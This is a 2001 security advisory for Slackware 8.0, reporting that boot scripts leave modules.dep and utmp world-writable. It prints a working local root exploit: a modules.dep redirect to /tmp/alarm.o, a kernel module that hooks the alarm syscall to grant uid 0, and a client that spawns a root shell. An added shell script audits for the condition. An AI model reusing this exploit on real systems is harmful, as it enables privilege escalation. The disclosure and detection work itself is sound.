slackware.init.txt

18 Jul 2001 | Reported by Josh | Type: packetstorm | Source: packetstormsecurity.com

In Slackware 8.0, files created by the startup scripts are left world-writable. Fix with umask 022.

`I posted this to the Linux kernel mailing list last Friday, July 13th 2001:  
  
Submitted by : Josh ([email protected]), lockdown  
([email protected]) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0. 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels, starting with 2.4.3 (I think), leave a umask of 0000  
after load. Any file the bootup scripts create without first issuing  
`umask 022` is therefore world-writable. In Slackware, these files include  
/var/run/utmp and /var/run/gpm.pid. The same vulnerability is responsible for  
creating /lib/modules/`uname -r`/modules.dep world-writable. With this file  
world-writable, all an intruder need do is put something like the following  
in /lib/modules/`uname -r`/modules.dep, assuming the system's startup scripts  
modprobe lp:  
  
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o  
  
/tmp/alarm.o:  
  
where the alarm.o module is:  
  
#include <linux/config.h>  
#include <linux/module.h>  
#include <linux/version.h>  
#include <linux/types.h>  
#include <asm/segment.h>  
#include <asm/unistd.h>  
#include <linux/dirent.h>  
#include <sys/syscall.h>  
#include <sys/sysmacros.h>  
  
#include <linux/sched.h>  
  
#include <linux/errno.h>  
#include <linux/fs.h>  
#include <linux/kernel.h>  
  
extern void* sys_call_table[];  
  
unsigned int (*old_alarm) (unsigned int seconds);  
unsigned int hacked_alarm (unsigned int seconds);  
  
unsigned int hacked_alarm(unsigned int seconds)  
{  
if(seconds == 454) {  
current->uid = 0;  
current->euid = 0;  
current->gid = 0;  
current->egid = 0;  
return 0;  
}  
return old_alarm(seconds);  
}  
  
int init_module(void) {  
old_alarm=sys_call_table[SYS_alarm];  
sys_call_table[SYS_alarm] = hacked_alarm;  
return 0;  
}  
  
void cleanup_module(void) {  
sys_call_table[SYS_alarm] = old_alarm;  
}  
  
Make a client:  
#include <stdio.h>  
#include <unistd.h>  
  
int main(void)  
{  
alarm(454);  
execl("/bin/sh", "sh", NULL);  
}  
  
which will, when the module is loaded, execute a shell as root.  
  
  
And of course with /var/run/utmp writeable, users can delete or in  
other ways manipulate their logins as they appear in  
w/who/finger/getlogin(), etc.  
`
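
A check for the condition the advisory describes, added here as an example (it is not code from the advisory or from Slackware): it lists world-writable files under the module and run directories and flags modules.dep entries that point outside the module tree. The function names and the sample tree are assumptions constructed for the illustration.

```shell
#!/bin/sh
# Added audit example, not code from the advisory. Function names are assumptions.

# Regular files under the given directories that any user can write to.
world_writable() {
    find "$@" -type f -perm -0002 2>/dev/null
}

# Absolute paths named in modules.dep (targets or dependencies) that lie
# outside the module tree. Relative entries, as newer depmod versions
# write, are relative to the tree and are not flagged.
foreign_deps() {    # usage: foreign_deps <modules.dep> <module_dir>
    awk -v root="$2/" '{
        gsub(/[:\\]/, " ")      # drop "target:" colons and "\" continuations
        for (i = 1; i <= NF; i++)
            if ($i ~ /^\// && index($i, root) != 1) print $i
    }' "$1" | sort -u
}

# Report both findings; exit status is 0 only when nothing was found.
audit() {           # usage: audit <module_dir> <run_dir>
    ww=$(world_writable "$1" "$2")
    fd=""
    [ -r "$1/modules.dep" ] && fd=$(foreign_deps "$1/modules.dep" "$1")
    [ -z "$ww" ] || printf 'world-writable:\n%s\n' "$ww"
    [ -z "$fd" ] || printf 'modules.dep points outside %s:\n%s\n' "$1" "$fd"
    [ -z "$ww$fd" ]
}

# Constructed sample tree: modules.dep left mode 666 with the lp.o entry
# from the advisory, plus a world-writable utmp and a correctly set pid file.
make_sample() {     # usage: make_sample <empty_dir>
    mkdir -p "$1/mod/kernel/drivers/char" "$1/run"
    printf '%s/mod/kernel/drivers/char/lp.o: /tmp/alarm.o\n\n/tmp/alarm.o:\n' \
        "$1" > "$1/mod/modules.dep"
    : > "$1/run/utmp"; : > "$1/run/ok.pid"
    chmod 666 "$1/mod/modules.dep" "$1/run/utmp"; chmod 644 "$1/run/ok.pid"
}

# With two arguments, audit real directories; otherwise audit the sample.
if [ "$#" -ge 2 ]; then
    audit "$1" "$2"
else
    d=$(mktemp -d) && make_sample "$d" && audit "$d/mod" "$d/run"; rm -rf "$d"
fi
```

On a live system, run it as `sh audit.sh /lib/modules/$(uname -r) /var/run`. A non-zero exit status means the files need their modes corrected and modules.dep regenerated with depmod, in addition to the `umask 022` fix.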
